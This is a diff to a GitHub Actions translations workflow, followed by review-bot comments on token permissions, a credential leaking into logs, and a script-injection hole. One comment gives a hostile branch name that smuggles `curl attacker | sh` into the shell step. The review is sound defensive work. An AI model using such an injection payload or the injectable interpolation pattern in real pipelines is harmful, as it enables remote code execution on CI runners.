diff --git a/.github/workflows/translations-changeset.yml b/.github/workflows/translations-changeset.yml
index 84cacf3a50..622b0e3867 100644
--- a/.github/workflows/translations-changeset.yml
+++ b/.github/workflows/translations-changeset.yml
@@ -11,6 +11,10 @@ jobs:
   create-translations-patch:
     if: github.actor == 'bc-svc-local'
     runs-on: ubuntu-latest
+    # Add permissions block to limit token scope
+    permissions:
+      contents: write
+      pull-requests: write
 
     steps:
       - name: Checkout repo
@@ -18,6 +22,16 @@ jobs:
         with:
           fetch-depth: 2
 
+      - name: Validate inputs
+        id: validate
+        run: |
+          # Validate ref name against allowed pattern (alphanumeric, dash, underscore, and forward slash only)
+          if ! [[ "${{ github.event.pull_request.head.ref }}" =~ ^[a-zA-Z0-9/_-]+$ ]]; then
+            echo "Error: Invalid branch name format"
+            exit 1
+          fi
+          echo "ref=${{ github.event.pull_request.head.ref }}" >> $GITHUB_OUTPUT
+
       - name: Use commit SHA for filename
         id: generate-sha
         run: |
@@ -44,8 +58,16 @@ jobs:
           git add .changeset/translations-patch-$SHORT_SHA.md
           git commit -m "chore(core): create translations patch"
 
-      - name: Push changeset
-        env:
-          TOKEN: ${{ secrets.GITHUB_TOKEN }}
-        run: |
-          git push https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }} HEAD:${{ github.event.pull_request.head.ref }}
+      - name: Push changes
+        uses: actions/github-script@v7
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+          script: |
+            const { repo, owner } = context.repo;
+            const ref = '${{ steps.validate.outputs.ref }}';
+
+            await exec.exec('git', [
+              'push',
+              `https://x-access-token:${process.env.GITHUB_TOKEN}@github.com/${owner}/${repo}`,
+              `HEAD:${ref}`
+            ]);
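Review bot: The new `permissions:` block grants `pull-requests: write`, but nothing visible in this workflow calls the pull-request API — the only privileged operation in the visible steps is the final `git push`, which needs `contents: write` alone. Unless a step outside these hunks uses the PR API, drop that line so the job token carries only what the push requires. The comment would also say more if it named the need rather than the mechanism, e.g. `# Least privilege: the job only pushes a changeset commit to the PR branch`. The rest of the job definition lies outside this hunk.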
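Review bot: The regex check in `Validate inputs` does not actually guard against a hostile branch name, because `${{ github.event.pull_request.head.ref }}` is substituted into the script text before bash runs it — a ref like `x" ; curl attacker | sh ; echo "` executes before the `[[ … =~ … ]]` test is evaluated, and the same expansion is repeated on the `echo "ref=…"` line. Pass the value through the environment instead: add `env:` / `HEAD_REF: ${{ github.event.pull_request.head.ref }}` to the step and reference `"$HEAD_REF"` in both the test and the `>> "$GITHUB_OUTPUT"` line, so the untrusted string is only ever data to the shell. The job-level `if: github.actor == 'bc-svc-local'` limits who can trigger the job, but the branch name still comes from the PR payload, so the validation should stand on its own rather than rely on that filter.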
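Review bot: `process.env.GITHUB_TOKEN` in the push URL is most likely undefined here: actions/github-script consumes the `github-token` input for its octokit client but does not export it as a `GITHUB_TOKEN` environment variable, so unless a job- or workflow-level `env:` outside this hunk sets it, the push authenticates as `x-access-token:undefined` and fails — and that literal is not masked in the log the way a real secret would be. Either add `env:` / `GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}` to the step, or, if the checkout step keeps the default persisted credentials, drop the token from the URL entirely with `await exec.exec('git', ['push', 'origin', `HEAD:${ref}`]);` — keeping a credential out of the argv is preferable anyway, since `exec.exec` echoes the command line by default. Splicing `ref` into a JS string literal is only safe because the validate step restricts it to `[a-zA-Z0-9/_-]`; a one-line comment above `const ref` stating that dependency, such as `// ref is safe to embed: validated against ^[a-zA-Z0-9/_-]+$ in the 'validate' step`, would keep a future edit from loosening one without the other.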